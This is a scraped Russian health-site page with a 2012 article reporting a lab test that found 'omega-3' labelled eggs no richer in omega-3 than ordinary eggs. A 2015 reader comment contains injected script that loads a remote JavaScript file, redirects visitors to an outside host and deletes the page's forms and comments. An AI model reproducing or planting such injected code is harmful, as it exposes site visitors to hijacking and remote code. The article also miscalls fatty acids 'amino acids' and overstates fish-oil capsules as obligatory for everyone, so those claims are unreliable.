Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Я не верю: омега-3 ПНЖК и...  >>  Я не верю: омега-3 ПНЖК и яйца
 
Обратная связь
 

Я не верю: омега-3 ПНЖК и яйца

Размер шрифта
08 апреля 2012 09:50
  • google_analytics: false
  • Нравится

Омега-3 полиненасыщенные жирные кислоты (омега-3 ПНЖК) официально признаны важными веществами для здоровья человека. Сегодня комплекс  омега-3 ПНЖК зарегистрирован как лекарство. Трудно поверить в то, что в яйцах, якобы содержащих омега-3 ПНЖК, этих веществ больше, чем в яйцах обычных. Мы попытались разобраться в этом.

Организм человека не способен синтезировать омега-3 ПНЖК, он получает их из пищи. Омега-З ПНЖК, как и все другие жирные кислоты, содержатся в жирах. Разница только в том, что, например, в свинине и яйцах, их очень мало. А вот в рыбе холодных морей – сельди, скумбрии и сардинах – очень много. Однако эти вещества не вырабатываются в рыбе, она получает их из пищи – планктона и водорослей.

Сегодня доказано, что не все жирные кислоты, а только три из них: альфа-линоленовая, докозагексаеновая и  эйкозапентаеновая, защищают человека от развития атеросклероза, инсульта и инфаркта миокарда.

Это открытие стало поводом для некоторых производителей использовать понятие «омега-3» для того, чтобы лучше продавать товар. Однако, если эти три аминокислоты не перечислены, то продукт не должен быть заявлен, как содержащий полезные омега-3 ПНЖК, и по сути он ничем не отличается от обычного продукта.

Лабораторное исследование

Мы взяли несколько яиц из упаковки с надписью «омега-3», положили их в общую коробку рядом с обычными яйцами и отправили на экспертизу в Институт питания.

Как известно, рыба получает омега-3 ПНЖК из водорослей и планктона. Но, может быть, эти вещества чудесным образом попали в те яйца, на упаковке которых есть упоминание об их наличии в составе?

Норма содержания омега-3 ПНЖК

Чтобы понимать, действительно ли в яйцах, помеченных производителем как содержащие повышенный уровень омега-3 ПНЖК, этих веществ больше, чем в обычных, нужно знать норму содержания омега-3 в 100 г. этого продукта.

Больше всего омега-3 ПНЖК (до 2 г) содержится в сельди, сардине и скумбрии, много их и в лососе – почти 1,5 г. В самых обычных яйцах омега-3 всего 0,1 г.

Результат лабораторного анализа

Как выяснилось во время исследования, количество омега-3 ПНЖК в яйцах из упаковки с надписью «омега-3» ничем не отличалось от содержания их в обычных яйцах: те же 0,1 г.

То есть, никакой дополнительной дозы омега-3 ПНЖК в «яйцах с омега-3» на самом деле не было. А это значит, что никакой нужды покупать эти, а не обычные яйца, тоже нет.

Вывод

Обращайте внимание на состав продуктов. Если вы интересуетесь продуктами, содержащими омега-3 ПНЖК, то покупайте только те, на упаковке которых есть не просто надпись «омега-3 ПНЖК», но и перечеслены три важные из них кислоты, а именно альфа-линоленовая, докозагексаеновая и  эйкозапентаеновая.

Источник омега-3 ПНЖК

Например, в кусочке рыбы весом 85 г содержится необходимое количество омега-3 ПНЖК (2 г), покрывающее суточную потребность человека.

Капсула рыбьего жира, содержащая 2 г этих омега-3 жирных кислот, стала обязательной в назначении  здоровым и больным для профилактики болезней сердца и сосудов в цивилизованном мире.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не хотите задавить ребенка – ешьте шпинат с яйцами!   Белок семян подсолнуха – новый переносчик лекарств   Незаменимый аргинин   Вегетарианство  

Слайдшоу

Как развеселиться и похудеть?    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.